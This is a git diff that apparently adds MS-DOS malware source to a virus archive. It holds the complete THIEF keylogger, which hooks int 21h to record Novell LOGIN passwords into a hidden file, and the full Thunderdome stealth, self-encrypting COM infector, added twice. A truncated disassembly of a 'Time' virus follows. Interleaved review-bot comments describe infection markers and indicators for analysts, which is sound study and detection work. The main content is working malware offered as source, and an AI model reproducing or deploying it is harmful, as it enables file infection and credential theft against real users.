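Review bot: There is no header describing the on-disk marker this variant leaves, which is the most useful thing an archive copy of a self-encrypting resident infector can carry. The `and cl,-32` / `or cl,STAMP` pair ahead of the 5701h call forces the seconds field of the host's time stamp to `STAMP` (31, apparently outside the valid 0..29 range of that field), and the same value is what `dir_stealth` and `check_infect2` test before subtracting `VIRUS_SIZE + 3` from the reported size, so the stamp is both infection marker and stealth key. Because `encrypt_code` takes a fresh key from `int 1Ah` on every infection, only the short decryptor ahead of `virus_code` stays constant in infected files, while the `'[BW]'` / `'Test virus #3'` strings are stored encrypted. A header such as `; marker: host time stamp seconds field = 31 (invalid); body XOR-encrypted per infection, only the decryptor stub is constant; residency check AX=0FA10h -> DX=0B8D4h` would capture all of that.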
@@ -0,0 +1,269 @@
+;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop.
+;Nadruk wordt door de redaktie toegestaan!
+;------------------------------------------------------------------------------
+;
+; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken
+;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of
+;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het
+;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van
+;een anonieme auteur.
+;
+; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma
+;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om
+;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong
+;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington
+;High School in Denver, Colorado USA.
+; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30
+;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait
+;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op
+;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden
+;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende
+;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2
+;model 80's(!) met harddisks. De systeembeheerders en andere "power-users"
+;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen
+;hard-disks, zij gebruiken geen boot-proms.
+; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF
+;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase.
+;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen"
+;programma op de bootschijf activeerde. Zodra er echter een programma met de
+;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle
+;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De
+;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft.
+; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de
+;zwakheden die deze hack mogelijk maken:
+; -Een boot-proces dat veranderd kan worden
+; -Fysieke toegang (door een onbevoegde) tot de computer
+; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is
+;Kees.
+; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde
+;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS:
+;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te
+;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op
+;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS.
+;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle
+;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het
+;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een
+;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had
+;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach,
+;zo werkt het ook.
+; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als
+;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de
+;problematiek van LAN-beveiliging.
+; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo
+;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte
+;genialiteit.
+;
+; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker
+;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren.
+;
+;
+; DE CODE VAN THIEF:
+;
+;
+cseg segment
+ assume cs:cseg,ds:cseg
+
+ org 100h
+ public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
+ public cntr,lits,begin
+
+ .RADIX 16
+start:
+ push cs
+ push cs
+ push cs
+ pop ds
+ pop es
+ mov ax,0fffeh
+ CLI
+ pop ss
+ mov sp,ax
+ STI
+ jmp begin
+oi21 dd ?
+ac dw 0
+ob dw 80h dup (?)
+buff2 db 80h dup (?)
+fn db 'c:\testing.tmp',0,' '
+search1 db 'LOGIN'
+foundf db 0
+fh dw 0
+flag db 0
+cntr dw 0
+
+ni21:
+ assume cs:cseg,ds:nothing,es:nothing
+ cmp ax,4b00h
+ je exec
+ cmp foundf,0ffh
+ jne nc
+ cmp ah,8
+ je oc
+ cmp ah,7
+ je oc
+
+nc:
+ push ax
+ mov al,cs:flag
+ not al
+ cmp al,0
+ jne jtov
+ mov ax,cntr
+ inc ax
+ mov cntr,ax
+ cmp ax,31h
+ jb jtov
+ xor ax,ax
+ mov cntr,ax
+ mov flag,al
+ pop ax
+ pushf
+ call dword ptr [oi21]
+ push ds
+ push cs
+ pop ds
+ push ax
+ push bx
+ push cx
+ push dx
+ jmp short wpwtf
+
+jtov:
+ pop ax
+ jmp dword ptr cs:[oi21]
+
+exec: call scanfor
+ jmp nc
+oc:
+
+ pushf
+ call dword ptr cs:[oi21]
+ assume ds:cseg
+ push ds
+ push cs
+ pop ds
+ push ax
+ push bx
+ push cx
+ push dx
+ mov bx,ac
+ mov [bx],al
+ inc bx
+ mov [ac],bx
+ cmp al,0dh
+ jne lethro
+ mov byte ptr [bx],0ah
+ not cs:[flag]
+lethro:
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ pop ds
+ iret
+
+scanfor:
+ push ax
+ push di
+ push si
+ push es
+ push ds
+ push cs
+ push cs
+ pop es
+ mov si,dx
+ mov di,offset buff2
+moveit:
+ lodsb
+ and al,0dfh
+ stosb
+ or al,al
+ jnz moveit
+ pop ds
+ mov di,offset buff2
+look:
+ push di
+ mov si,offset search1
+ mov cx,5
+ repe cmpsb
+ pop di
+ or cx,cx
+ jz foundit
+ inc di
+ cmp byte ptr [di+5],0
+ je not_found
+ jmp look
+not_found:
+ xor ax,ax
+ mov foundf,al
+ jmp short endofsearch
+foundit:
+ mov ax,0ffh
+ mov foundf,al
+endofsearch:
+ pop ds
+ pop es
+ pop si
+ pop di
+ pop ax
+ ret
+
+wpwtf:
+ mov ax,3d02h
+ mov dx,offset fn
+ pushf
+ call dword ptr [oi21]
+ jnc exist
+ cmp al,2
+ je create
+ jmp lethro
+create:
+ mov ah,3ch
+ mov dx,offset fn
+ mov cx,02h+04h
+ pushf
+ call dword ptr [oi21]
+ jnc exist
+ jmp lethro
+exist:
+ mov fh,ax
+ mov bx,ax
+ mov ax,4202h
+ xor cx,cx
+ xor dx,dx
+ pushf
+ call dword ptr [oi21]
+ mov cx,[ac]
+ mov dx,offset ob
+ sub cx,dx
+ mov [ac],dx
+ inc cx
+ mov bx,fh
+ mov ah,40h
+ pushf
+ call dword ptr [oi21]
+ mov ah,3eh
+ mov bx,fh
+ pushf
+ call dword ptr [oi21]
+ jmp lethro
+
+lits db 90h
+begin:
+ mov ax,offset ob
+ mov [ac],ax
+ mov ax,3521h
+ int 21h
+ mov di,offset oi21
+ mov [di],bx
+ mov [di+2],es
+ mov dx,offset ni21
+ push cs
+ pop ds
+ mov ax,2521h
+ int 21h
+ mov dx,offset lits
+ int 27h
+cseg ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.thunder.a86 b/MSDOS/Virus.MSDOS.Unknown.thunder.a86
new file mode 100644
index 00000000..0567b138
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.thunder.a86
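Review bot: The file ends without a trailing newline (`\ No newline at end of file`) and its only documentation is the Dutch Hack-Tic article kept as comment lines, so an English one-line header would help a reader who cannot follow the preamble, e.g. `; THIEF (a.k.a. GETIT): int 21h TSR; after an AH=4Bh exec whose file name contains LOGIN it records AH=07h/08h keyboard input and appends it to c:\testing.tmp, created hidden+system (attributes 02h+04h)`. The host-side artefacts an investigator would look for are that file, the int 21h vector redirected to `ni21` (taken with 3521h/2521h and kept resident by `int 27h`), and the extra AUTOEXEC.BAT line the article describes. One reading caveat worth a comment: `.RADIX 16` makes every unsuffixed literal hexadecimal; all literals visible here are either suffixed or single digits, so nothing changes, but the `h` suffixes that follow are redundant rather than meaningful.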
@@ -0,0 +1,403 @@
+;
+; Thunderdome virus by John Tardy / TridenT
+;
+
+ Org 0h
+
+decr: jmp Crypt
+ db 'Carcass'
+Loopje DB 0e2h
+ db 0fah
+DecrLen Equ $-Decr
+
+Crypt: Push Ax
+ call Get_Ofs
+Get_Ofs: pop Bp
+ sub Bp,Get_Ofs
+
+ Mov Ah,2ah
+ Int 21h
+ Cmp Cx,1993
+ Ja Makeya
+ jb Installed
+ Cmp Dh,10
+ Jb installed
+
+
+Makeya: Mov Ax,0DEADh
+ Int 21h
+ Cmp Ax,0AAAAh
+ Je Installed
+
+ mov ax,3521h
+ int 21h
+ mov word ptr cs:old21[bp],bx
+ mov word ptr cs:old21[bp][2],es
+
+ mov ax,cs
+ dec ax
+ mov ds,ax
+ cmp byte ptr ds:[0000],'Z'
+ jne installed
+ mov ax,word ptr ds:[0003]
+ sub ax,ParLen
+ jb installed
+ mov word ptr ds:[0003],ax
+ sub word ptr ds:[0012h],ParLen
+ lea si,decr[bp]
+ xor di,di
+ mov es,ds:[12h]
+ mov ds,cs
+ mov cx,virlen
+ rep movsb
+ mov ax,2521h
+ mov ds,es
+ mov dx,offset new21
+ int 21h
+Installed: Mov Di,100h
+ Push Di
+ Lea Si,Org_Prg[Bp]
+ Push Cs
+ Pop Ds
+ Push Cs
+ Pop Es
+ Movsw
+ Movsb
+ Pop Bx
+ Pop Ax
+ Jmp Bx
+
+Old21 dd 0
+
+New21: cmp ax,0deadh
+ jne chkfunc
+ mov cx,0aaaah
+ mov ax,cx
+ iret
+chkfunc: cmp ah,12h
+ je findFCBst
+ cmp ah,11h
+ je findfcbst
+ cmp ah,4fh
+ je findst
+ cmp ah,4eh
+ je findst
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push bp
+ push ds
+ push es
+ cmp ah,3dh
+ je infectHan
+ cmp ah,4bh
+ je infectHan
+ cmp ah,41h
+ je infectHan
+ cmp ah,43h
+ je infectHan
+ cmp ah,56h
+ je infectHan
+ cmp ah,0fh
+ je infectFCB
+ cmp ah,23h
+ je infectFCB
+ cmp ah,6ch
+ je infectdos4
+ jmp endint
+
+findfcbst: jmp findfcb
+findst: jmp find
+
+InfectFCB: mov si,dx
+ lodsb
+ push cs
+ pop es
+ lea di,fnam
+ mov cx,8
+ rep movsb
+ mov cx,3
+ inc di
+ rep movsb
+ lea dx,fnam
+ push cs
+ pop ds
+
+InfectHan: mov si,dx
+ mov cx,100h
+findpnt: lodsb
+ cmp al,'.'
+ je chkcom
+ loop findpnt
+ jmp endi
+
+infectdos4: and dx,0fh
+ cmp dx,1
+ jne endi
+ mov dx,si
+ jmp infecthan
+
+chkcom: lodsw
+ or ax,2020h
+ cmp ax,'oc'
+ jne endi
+ lodsb
+ or al,20h
+ cmp al,'m'
+ je doitj
+endi: jmp endint
+doitj: push dx
+ push ds
+ mov ax,4300h
+ call dos
+ mov cs:fatr,cx
+ mov ax,4301h
+ sub cx,cx
+ call dos
+ mov ax,3d02h
+ call dos
+ jnc getdate
+ jmp error
+getdate: mov bx,5700h
+ xchg ax,bx
+ call dos
+ mov cs:fdat,cx
+ mov cs:fdat+2,dx
+ and cx,1fh
+ cmp cx,1fh
+ jne chkexe
+ jmp done
+chkexe: mov ah,3fh
+ push cs
+ pop ds
+ lea dx,Org_prg
+ mov cx,3
+ call dos
+ cmp word ptr cs:Org_prg[0],'MZ'
+ je close
+ cmp word ptr cs:Org_prg[0],'ZM'
+ je close
+
+ Mov ax,4202h
+ sub cx,cx
+ cwd
+ call dos
+
+ sub ax,3
+ mov cs:jump[1],ax
+
+ Add Ax,Offset Crypt+103h
+ Mov S_1[1],Ax
+ Mov S_2[1],Ax
+ Mov S_3[4],Ax
+ Mov S_4[4],Ax
+ Call GenPoly
+
+ mov ah,40h
+ push cs
+ pop ds
+ lea dx,coder
+ mov cx,virlen
+ call dos
+
+ mov ax,4200h
+ xor cx,cx
+ cwd
+ call dos
+
+ mov ah,40h
+ lea dx,jump
+ mov cx,3
+ call dos
+
+ or cs:fdat,01fh
+
+close: mov ax,5701h
+ mov cx,cs:fdat
+ mov dx,cs:fdat[2]
+ call dos
+
+done: mov ah,3eh
+ call dos
+ pop ds
+ pop dx
+ push dx
+ push ds
+ mov ax,4301h
+ mov cx,fatr
+ call dos
+
+error: pop ds
+ pop dx
+
+endint: pop es
+ pop ds
+ pop bp
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ jmp d ptr cs:[old21]
+
+GenPoly: Xor Byte Ptr [Loopje],2
+ Xor Ax,Ax
+ Mov Es,Ax
+ Mov Ax,Es:[46ch]
+ Mov Es,Cs
+ Push Ax
+ And Ax,07ffh
+ Add Ax,CryptLen
+ Mov S_1[4],Ax
+ Mov S_2[4],Ax
+ Mov S_3[1],Ax
+ Mov S_4[1],Ax
+Doit: Pop Ax
+ Push Ax
+ And Ax,3
+ Shl Ax,1
+ Mov Si,Ax
+ Mov Ax,W Table[Si]
+ Mov Si,Ax
+ Lea Di,decr
+ Movsw
+ Movsw
+ Movsw
+ Movsw
+ Pop Ax
+ Stosb
+ Movsb
+ Mov Dl,Al
+ Lea Si,Decr
+ Lea Di,Coder
+ Mov Cx,DecrLen
+ Rep Movsb
+ Lea Si,Crypt
+ Mov Cx,CryptLen
+Encrypt: Lodsb
+ Xor Al,Dl
+ Stosb
+ Loop Encrypt
+ Cmp Dl,0
+ Je Fuckit
+ Ret
+
+FuckIt: Lea Si,Encr0
+ Lea Di,Coder
+ Mov Cx,Encr0Len
+ Rep Movsb
+ Mov Ax,Cs:jump[1]
+ Add Ax,Encr0Len+2
+ Mov Cs:jump[1],Ax
+ Ret
+
+ Db 13,10,'Created in Holland, released near Bolzano/Italy.'
+ Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
+ Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
+ Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
+ Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
+ Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
+ Db 13,10,'Greetings go to all other virus writers!'
+
+Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
+
+S_1: Lea Si,0
+ Mov Cx,0
+ DB 80h,34h
+ Inc Si
+S_2: Lea Di,0
+ Mov Cx,0
+ DB 80h,35h
+ Inc Di
+S_3: Mov Cx,0
+ Lea Si,0
+ DB 80h,34h
+ Inc Si
+S_4: Mov Cx,0
+ Lea Di,0
+ DB 80h,35h
+ Inc Di
+
+ Db '[ "Thunderdome" virus by '
+
+Encr0 Db 'John Tardy'
+Encr0Len Equ $-Encr0
+
+ Db ' / TridenT ]'
+
+getdta: pop si
+ pushf
+ push ax
+ push bx
+ push es
+ mov ah,2fh
+ call dos
+ jmp short si
+
+FindFCB: call DOS
+ cmp al,0
+ jne Ret1
+ call getdta
+ cmp byte ptr es:[bx],-1
+ jne FCBOk
+ add bx,8
+FCBOk: mov al,es:[bx+16h]
+ and al,1fh
+ cmp al,1fh
+ jne FileOk
+ sub word ptr es:[bx+1ch],Virlen
+ sbb word ptr es:[bx+1eh],0
+ jmp short Time
+
+Find: call DOS
+ jc Ret1
+ call getdta
+ mov al,es:[bx+16h]
+ and al,1fh
+ cmp al,1fh
+ jne FileOk
+ sub word ptr es:[bx+1ah],VirLen
+ sbb word ptr es:[bx+1ch],0
+Time: xor byte ptr es:[bx+16h],10h
+FileOk: pop es
+ pop bx
+ pop ax
+ popf
+Ret1: retf 2
+
+dos: pushf
+ call dword ptr cs:[old21]
+ ret
+
+Org_prg dw 0cd90h
+ db 20h
+
+fnam db 8 dup (0)
+ db '.'
+ db 3 dup (0)
+ db 0
+fatr dw 0
+fdat dw 0,0
+
+
+jump db 0e9h,0,0
+
+ResLen Equ ($-Decr)/10h
+
+ParLen Equ (Reslen*2)+10h
+
+CryptLen Equ $-Crypt
+
+VirLen Equ $-Decr
+
+Coder Equ $
+
+
+;
+; > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <
+; > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <
+;
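Review bot: `MSDOS/Virus.MSDOS.Unknown.thunder.a86` and `MSDOS/Virus.MSDOS.Unknown.thunder.asm` are the same file added twice — both file sections carry `index 00000000..0567b138` and their 403 lines are identical — so one copy should be dropped, or a header should state which is the original (the `W Table[Si]` and `d ptr` size shorthands look like A86 syntax, which would make `.a86` the original and `.asm` the duplicate; verify before deleting). Whichever file is kept would benefit from a header naming the sample's fixed artefacts, since `GenPoly` re-encrypts the body with a timer-derived byte on each infection: the `'Carcass'` string inside the decryptor, the four `S_1`..`S_4` decryptor templates selected through `Table`, the host time stamp whose seconds field is forced to 1Fh by `or cs:fdat,01fh` and tested by `getdate`, `FindFCB` and `Find`, and the `0DEADh` -> `0AAAAh` int 21h residency handshake. The same note applies to the `.asm` hunk that follows.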
diff --git a/MSDOS/Virus.MSDOS.Unknown.thunder.asm b/MSDOS/Virus.MSDOS.Unknown.thunder.asm
new file mode 100644
index 00000000..0567b138
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.thunder.asm
@@ -0,0 +1,403 @@
+;
+; Thunderdome virus by John Tardy / TridenT
+;
+
+ Org 0h
+
+decr: jmp Crypt
+ db 'Carcass'
+Loopje DB 0e2h
+ db 0fah
+DecrLen Equ $-Decr
+
+Crypt: Push Ax
+ call Get_Ofs
+Get_Ofs: pop Bp
+ sub Bp,Get_Ofs
+
+ Mov Ah,2ah
+ Int 21h
+ Cmp Cx,1993
+ Ja Makeya
+ jb Installed
+ Cmp Dh,10
+ Jb installed
+
+
+Makeya: Mov Ax,0DEADh
+ Int 21h
+ Cmp Ax,0AAAAh
+ Je Installed
+
+ mov ax,3521h
+ int 21h
+ mov word ptr cs:old21[bp],bx
+ mov word ptr cs:old21[bp][2],es
+
+ mov ax,cs
+ dec ax
+ mov ds,ax
+ cmp byte ptr ds:[0000],'Z'
+ jne installed
+ mov ax,word ptr ds:[0003]
+ sub ax,ParLen
+ jb installed
+ mov word ptr ds:[0003],ax
+ sub word ptr ds:[0012h],ParLen
+ lea si,decr[bp]
+ xor di,di
+ mov es,ds:[12h]
+ mov ds,cs
+ mov cx,virlen
+ rep movsb
+ mov ax,2521h
+ mov ds,es
+ mov dx,offset new21
+ int 21h
+Installed: Mov Di,100h
+ Push Di
+ Lea Si,Org_Prg[Bp]
+ Push Cs
+ Pop Ds
+ Push Cs
+ Pop Es
+ Movsw
+ Movsb
+ Pop Bx
+ Pop Ax
+ Jmp Bx
+
+Old21 dd 0
+
+New21: cmp ax,0deadh
+ jne chkfunc
+ mov cx,0aaaah
+ mov ax,cx
+ iret
+chkfunc: cmp ah,12h
+ je findFCBst
+ cmp ah,11h
+ je findfcbst
+ cmp ah,4fh
+ je findst
+ cmp ah,4eh
+ je findst
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push bp
+ push ds
+ push es
+ cmp ah,3dh
+ je infectHan
+ cmp ah,4bh
+ je infectHan
+ cmp ah,41h
+ je infectHan
+ cmp ah,43h
+ je infectHan
+ cmp ah,56h
+ je infectHan
+ cmp ah,0fh
+ je infectFCB
+ cmp ah,23h
+ je infectFCB
+ cmp ah,6ch
+ je infectdos4
+ jmp endint
+
+findfcbst: jmp findfcb
+findst: jmp find
+
+InfectFCB: mov si,dx
+ lodsb
+ push cs
+ pop es
+ lea di,fnam
+ mov cx,8
+ rep movsb
+ mov cx,3
+ inc di
+ rep movsb
+ lea dx,fnam
+ push cs
+ pop ds
+
+InfectHan: mov si,dx
+ mov cx,100h
+findpnt: lodsb
+ cmp al,'.'
+ je chkcom
+ loop findpnt
+ jmp endi
+
+infectdos4: and dx,0fh
+ cmp dx,1
+ jne endi
+ mov dx,si
+ jmp infecthan
+
+chkcom: lodsw
+ or ax,2020h
+ cmp ax,'oc'
+ jne endi
+ lodsb
+ or al,20h
+ cmp al,'m'
+ je doitj
+endi: jmp endint
+doitj: push dx
+ push ds
+ mov ax,4300h
+ call dos
+ mov cs:fatr,cx
+ mov ax,4301h
+ sub cx,cx
+ call dos
+ mov ax,3d02h
+ call dos
+ jnc getdate
+ jmp error
+getdate: mov bx,5700h
+ xchg ax,bx
+ call dos
+ mov cs:fdat,cx
+ mov cs:fdat+2,dx
+ and cx,1fh
+ cmp cx,1fh
+ jne chkexe
+ jmp done
+chkexe: mov ah,3fh
+ push cs
+ pop ds
+ lea dx,Org_prg
+ mov cx,3
+ call dos
+ cmp word ptr cs:Org_prg[0],'MZ'
+ je close
+ cmp word ptr cs:Org_prg[0],'ZM'
+ je close
+
+ Mov ax,4202h
+ sub cx,cx
+ cwd
+ call dos
+
+ sub ax,3
+ mov cs:jump[1],ax
+
+ Add Ax,Offset Crypt+103h
+ Mov S_1[1],Ax
+ Mov S_2[1],Ax
+ Mov S_3[4],Ax
+ Mov S_4[4],Ax
+ Call GenPoly
+
+ mov ah,40h
+ push cs
+ pop ds
+ lea dx,coder
+ mov cx,virlen
+ call dos
+
+ mov ax,4200h
+ xor cx,cx
+ cwd
+ call dos
+
+ mov ah,40h
+ lea dx,jump
+ mov cx,3
+ call dos
+
+ or cs:fdat,01fh
+
+close: mov ax,5701h
+ mov cx,cs:fdat
+ mov dx,cs:fdat[2]
+ call dos
+
+done: mov ah,3eh
+ call dos
+ pop ds
+ pop dx
+ push dx
+ push ds
+ mov ax,4301h
+ mov cx,fatr
+ call dos
+
+error: pop ds
+ pop dx
+
+endint: pop es
+ pop ds
+ pop bp
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ jmp d ptr cs:[old21]
+
+GenPoly: Xor Byte Ptr [Loopje],2
+ Xor Ax,Ax
+ Mov Es,Ax
+ Mov Ax,Es:[46ch]
+ Mov Es,Cs
+ Push Ax
+ And Ax,07ffh
+ Add Ax,CryptLen
+ Mov S_1[4],Ax
+ Mov S_2[4],Ax
+ Mov S_3[1],Ax
+ Mov S_4[1],Ax
+Doit: Pop Ax
+ Push Ax
+ And Ax,3
+ Shl Ax,1
+ Mov Si,Ax
+ Mov Ax,W Table[Si]
+ Mov Si,Ax
+ Lea Di,decr
+ Movsw
+ Movsw
+ Movsw
+ Movsw
+ Pop Ax
+ Stosb
+ Movsb
+ Mov Dl,Al
+ Lea Si,Decr
+ Lea Di,Coder
+ Mov Cx,DecrLen
+ Rep Movsb
+ Lea Si,Crypt
+ Mov Cx,CryptLen
+Encrypt: Lodsb
+ Xor Al,Dl
+ Stosb
+ Loop Encrypt
+ Cmp Dl,0
+ Je Fuckit
+ Ret
+
+FuckIt: Lea Si,Encr0
+ Lea Di,Coder
+ Mov Cx,Encr0Len
+ Rep Movsb
+ Mov Ax,Cs:jump[1]
+ Add Ax,Encr0Len+2
+ Mov Cs:jump[1],Ax
+ Ret
+
+ Db 13,10,'Created in Holland, released near Bolzano/Italy.'
+ Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
+ Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
+ Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
+ Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
+ Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
+ Db 13,10,'Greetings go to all other virus writers!'
+
+Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
+
+S_1: Lea Si,0
+ Mov Cx,0
+ DB 80h,34h
+ Inc Si
+S_2: Lea Di,0
+ Mov Cx,0
+ DB 80h,35h
+ Inc Di
+S_3: Mov Cx,0
+ Lea Si,0
+ DB 80h,34h
+ Inc Si
+S_4: Mov Cx,0
+ Lea Di,0
+ DB 80h,35h
+ Inc Di
+
+ Db '[ "Thunderdome" virus by '
+
+Encr0 Db 'John Tardy'
+Encr0Len Equ $-Encr0
+
+ Db ' / TridenT ]'
+
+getdta: pop si
+ pushf
+ push ax
+ push bx
+ push es
+ mov ah,2fh
+ call dos
+ jmp short si
+
+FindFCB: call DOS
+ cmp al,0
+ jne Ret1
+ call getdta
+ cmp byte ptr es:[bx],-1
+ jne FCBOk
+ add bx,8
+FCBOk: mov al,es:[bx+16h]
+ and al,1fh
+ cmp al,1fh
+ jne FileOk
+ sub word ptr es:[bx+1ch],Virlen
+ sbb word ptr es:[bx+1eh],0
+ jmp short Time
+
+Find: call DOS
+ jc Ret1
+ call getdta
+ mov al,es:[bx+16h]
+ and al,1fh
+ cmp al,1fh
+ jne FileOk
+ sub word ptr es:[bx+1ah],VirLen
+ sbb word ptr es:[bx+1ch],0
+Time: xor byte ptr es:[bx+16h],10h
+FileOk: pop es
+ pop bx
+ pop ax
+ popf
+Ret1: retf 2
+
+dos: pushf
+ call dword ptr cs:[old21]
+ ret
+
+Org_prg dw 0cd90h
+ db 20h
+
+fnam db 8 dup (0)
+ db '.'
+ db 3 dup (0)
+ db 0
+fatr dw 0
+fdat dw 0,0
+
+
+jump db 0e9h,0,0
+
+ResLen Equ ($-Decr)/10h
+
+ParLen Equ (Reslen*2)+10h
+
+CryptLen Equ $-Crypt
+
+VirLen Equ $-Decr
+
+Coder Equ $
+
+
+;
+; > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <
+; > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <
+;
diff --git a/MSDOS/Virus.MSDOS.Unknown.time.asm b/MSDOS/Virus.MSDOS.Unknown.time.asm
new file mode 100644
index 00000000..f00138a1
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.time.asm
@@ -0,0 +1,785 @@ +; Start disassembly +DATA_1E EQU 64H ; (761D:0064=0) +DATA_2E EQU 66H ; (761D:0066=0) +DATA_3E EQU 68H ; (761D:0068=0) +DATA_10E EQU 4F43H ; (761D:4F43=0) +DATA_11E EQU 504DH ; (761D:504D=0) + +SEG_A SEGMENT + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +Time PROC FAR + +start: + JMP Virus_Entry_Point ; + +; +; +; Original Program without 1st three bytes... +; +; + +DATA_5 DB 9987 DUP (90H) + MOV AH,4CH ; + MOV AL,DATA_2 ; Terminate to DOS with + INT 21H ; exitcode AL + DB 0 +DATA_2 DB 0 + DB 0 + +; +; +; Virus Entry Point +; +; + +Virus_Entry_Point: + JMP SHORT Set_Virus_Data_Point + NOP + +; +; +; Set Virus Data Storage Point +; +; + +Set_Virus_Data_Point: + PUSH CX ; Store CX + MOV DX,2B2DH ; + MOV SI,DX ; SI points at start of + ; virus data + +; +; +; Get DTA Address +; +; + + + PUSH ES ; Store ES + MOV AH,2FH ; GET DTA address into + INT 21H ; ES:BX + MOV [SI],BX ; Store BX of DTA + MOV [SI+2],ES ; Store ES of DTA + POP ES ; Restore ES + +; +; +; Set new DTA Address +; +; + + MOV DX,4EH ; + ADD DX,SI ; + MOV AH,1AH ; + INT 21H ; Set new DTA to DS:DX + + PUSH SI ; Store SI + CLD ; Clear direction + MOV DI,SI ; + ADD SI,0AH ; + ADD DI,81H ; + MOV CX,3 ; Move 3 bytes from source + REP MOVSB ; to destination (E9h, 45h + ; 45h) + POP SI ; Restore SI + + PUSH ES ; Store ES + PUSH SI ; Store SI + PUSH BX ; Store BX + MOV BX,2CH + MOV AX,[BX] ; Get Extra Segment? + POP BX ; Restore BX + MOV ES,AX + MOV DI,0 + +; +; +; Search for the PATH +; +; + +Search_For_Path: + POP SI ; Restore SI + PUSH SI ; Store SI + ADD SI,1AH ; + LODSB ; Load the 'M' into AL + MOV CX,8000H ; + REPNE SCASB ; + MOV CX,4 ; + Path_Loop: + LODSB ; + SCASB ; + JNZ Search_For_Path ; + LOOP Path_Loop ; Pitty, PATH not yet found. + + POP SI ; Restore SI + POP ES ; Restore ES + MOV [SI+16H],DI ; Store address of PATH + MOV BX,SI ; Temp. 
Storage of SI + ADD SI,26H ; + MOV DI,SI ; + JMP SHORT Find_First_FileName + NOP + +; +; +; +; +; + +Error: + CMP WORD PTR [SI+16H],0 + JNE Set_Virus_Path ; + JMP Restore_Org_DTA ; Error occured. Restore + ; original DTA, + ; 1st three bytes and + ; execute original + ; program. + +; +; +; Start Searching for PATH +; +; + +Set_Virus_Path: + PUSH DS ; Store Registers + PUSH SI + PUSH AX + PUSH ES + PUSH ES + POP DS ; DS=ES + PUSH BX + MOV BX,2CH + MOV AX,[BX] + POP BX ; Restore BX + MOV [SI+1FH],AX ; + MOV DI,SI ; + MOV AX,[DI+16H] ; Org.address of PATH + MOV SI,AX ; + MOV DS,[DI+1FH] ; + POP ES ; + POP AX ; + ADD DI,26H ; +Reached_EO_Path: + LODSB ; Get byte into AL + CMP AL,3BH ; Path Delimiter ';' reached? + JE Delimiter_Reached ; Yes + CMP AL,0 ; End of Path reached? + JE EO_Path_Reached ; Yes + STOSB ; Store byte in AL + JMP SHORT Reached_EO_Path ; +EO_Path_Reached: + MOV SI,0 ; +Delimiter_Reached: + POP BX ; + POP DS ; + MOV 